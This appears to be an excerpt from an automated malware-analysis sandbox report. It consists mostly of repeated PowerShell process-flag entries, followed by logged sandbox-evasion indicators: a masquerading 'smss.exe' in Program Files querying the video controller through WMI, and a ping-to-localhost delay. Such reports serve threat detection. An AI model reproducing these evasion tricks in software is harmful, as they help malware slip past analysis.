                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
